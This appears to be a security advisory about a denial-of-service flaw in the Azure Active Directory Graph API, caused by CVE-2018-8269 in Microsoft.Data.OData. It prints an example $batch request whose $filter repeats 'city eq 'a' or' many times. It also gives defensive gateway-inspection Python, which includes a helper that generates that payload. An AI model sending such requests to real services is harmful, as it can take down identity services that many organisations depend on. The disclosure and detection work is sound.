Azure Active Directory Graph API
A vulnerability in Azure Active Directory Graph API could allow a remote authenticated attacker to make the service unavailable.
Azure Active Directory is Microsoft’s cloud service that provides identity and access management (IAM) services. It is used by many organizations to authenticate users in Microsoft Azure applications as well as on-premises applications.
Azure Active Directory Graph API is a REST-based interface that provides programmatic access to this service.
Many applications use this API to interact with Azure Active Directory. If the Graph API is unavailable for an organization, all the applications that depend on it will most likely be unavailable as well.
The vulnerability results from this service's dependency on the Microsoft.Data.OData library, which was vulnerable to a remote denial of service (see CVE-2018-8269).
The exploit consists of sending an OData batch request that contains a $filter parameter with many repetitions of city+eq+'a'+or+city+eq+'a'+or+city+eq+'a'+ ... .
Here is an example of such a request.
POST https://graph.windows.net/<org id>/$batch?api-version=1.6 HTTP/1.1
Host: graph.windows.net
Authorization: Bearer XXXXX
content-type: multipart/mixed; boundary=RRR
Content-Length: 216

--RRR
Content-type: application/http
Content-Transfer-Encoding: binary

GET https://graph.windows.net/<org id>/users?$filter=city+eq+'a'+or+city+eq+'a'+or.... HTTP/1.1
accept: application/json;odata=minimalmetadata

--RRR--
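The request above shows why a $batch envelope matters for detection: the pathological $filter is hidden inside an embedded application/http part rather than in the outer URL, so a gateway that only inspects the top-level query string never sees it. The following Python is an added example written for this page, not code from Microsoft or from the Microsoft.Data.OData project. It models a request-inspection step that an API gateway or reverse proxy could apply in front of an OData service: it unwraps multipart/mixed batch bodies, extracts the $filter of every inner request, counts the logical and/or operators outside string literals, and flags expressions that exceed a threshold. The MAX_LOGICAL_OPERATORS limit, the example-tenant-id placeholder and the build_sample_batch helper are assumptions constructed for the example; the only real fix is updating the vulnerable library, and this check is a compensating control for the interval before that happens.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Upper bound on 'and'/'or' operators accepted in one $filter expression.
# Assumption chosen for this example, not a limit published by Microsoft.
MAX_LOGICAL_OPERATORS = 50

# OData string literals are single-quoted; '' inside a literal is an escaped quote.
_STRING_LITERAL_RE = re.compile(r"'(?:[^']|'')*'")
# Logical operators as whole words (OData spells them lowercase; match loosely).
_LOGICAL_OP_RE = re.compile(r"\b(?:and|or)\b", re.IGNORECASE)
# Request line of an embedded application/http part inside a $batch body.
_REQUEST_LINE_RE = re.compile(
    r"^(?:GET|POST|PATCH|PUT|DELETE)\s+(\S+)\s+HTTP/1\.[01]\s*$", re.MULTILINE
)


def count_logical_operators(filter_expr: str) -> int:
    """Count and/or operators in a decoded $filter, ignoring words inside string literals."""
    stripped = _STRING_LITERAL_RE.sub("''", filter_expr)
    return len(_LOGICAL_OP_RE.findall(stripped))


def extract_filter(url: str) -> Optional[str]:
    """Return the decoded $filter query parameter of a URL, or None if it is absent."""
    # parse_qs decodes '+' to a space, which is how OData separates tokens in the URL.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = query.get("$filter")
    return values[0] if values else None


def extract_batch_urls(content_type: str, body: str) -> List[str]:
    """Return the URL of every inner request found in a multipart/mixed $batch body."""
    match = re.search(r'boundary="?([^";\s]+)"?', content_type, re.IGNORECASE)
    if not match:
        return []
    boundary = "--" + match.group(1)
    urls: List[str] = []
    for part in body.split(boundary):
        urls.extend(_REQUEST_LINE_RE.findall(part))
    return urls


def inspect_request(url: str, headers: Dict[str, str], body: str) -> List[dict]:
    """Inspect a direct request or a $batch envelope.

    Returns one finding per (inner) request that carries a $filter, with the
    operator count and whether the gateway should reject it. Header names are
    expected lowercase, as a proxy would normalise them.
    """
    content_type = headers.get("content-type", "")
    is_batch = urlsplit(url).path.endswith("/$batch") and content_type.lower().startswith("multipart/mixed")
    targets = extract_batch_urls(content_type, body) if is_batch else [url]
    findings = []
    for target in targets:
        filter_expr = extract_filter(target)
        if filter_expr is None:
            continue
        operators = count_logical_operators(filter_expr)
        findings.append({"url": target, "operators": operators, "reject": operators > MAX_LOGICAL_OPERATORS})
    return findings


def build_sample_batch(repetitions: int) -> Tuple[str, Dict[str, str], str]:
    """Construct a $batch envelope (sample data, not a captured request) whose inner GET
    carries a $filter made of `repetitions` copies of city eq 'a' joined by or."""
    joined = "+or+".join(["city+eq+'a'"] * repetitions)
    inner_url = f"https://graph.windows.net/example-tenant-id/users?$filter={joined}"
    body = (
        "--RRR\r\n"
        "Content-type: application/http\r\n"
        "Content-Transfer-Encoding: binary\r\n"
        "\r\n"
        f"GET {inner_url} HTTP/1.1\r\n"
        "accept: application/json;odata=minimalmetadata\r\n"
        "\r\n"
        "--RRR--\r\n"
    )
    headers = {"content-type": "multipart/mixed; boundary=RRR"}
    return "https://graph.windows.net/example-tenant-id/$batch?api-version=1.6", headers, body


if __name__ == "__main__":
    batch_url, batch_headers, batch_body = build_sample_batch(200)
    for finding in inspect_request(batch_url, batch_headers, batch_body):
        verdict = "REJECT" if finding["reject"] else "allow"
        print(f"{verdict}: {finding['operators']} logical operators in $filter")
```

The operator count is a deliberately coarse complexity measure: it does not try to evaluate the expression, only to bound the work handed to the OData parser, which is what the repeated city+eq+'a'+or... pattern exhausts. Nested changesets inside a batch are covered as well, because the scan looks for request lines in every part rather than trusting the outer structure.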